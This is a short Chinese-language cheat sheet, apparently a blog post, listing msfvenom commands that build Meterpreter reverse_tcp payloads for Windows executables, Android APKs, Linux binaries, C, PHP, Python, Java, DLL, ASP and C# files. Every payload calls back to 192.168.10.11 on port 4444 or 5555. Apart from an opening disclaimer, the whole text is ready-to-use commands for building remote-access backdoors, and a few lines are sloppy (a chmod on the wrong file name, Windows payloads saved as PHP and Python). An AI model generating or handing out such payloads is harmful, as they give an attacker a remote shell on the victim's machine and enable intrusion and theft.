免责声明:如果您不确定自己在做什么,请不要尝试在本文中使用任何内容。
在windows系统下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe
在安卓下:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=5555 R> apk.apk
在Linux下:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 R > /root/Desktop/toanle
注意:需要把toanle加权限 chmod +x ./test
在C语言里:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f c > shellcode.c
在php:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.php
在python里:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.py
在java里;
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 W > text.jar
在DLL里
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -a x86 -f dll > shell.dll
在asp或者aspx里:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f asp > shell.asp
在C#里:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f csharp > shellcode.txt
评论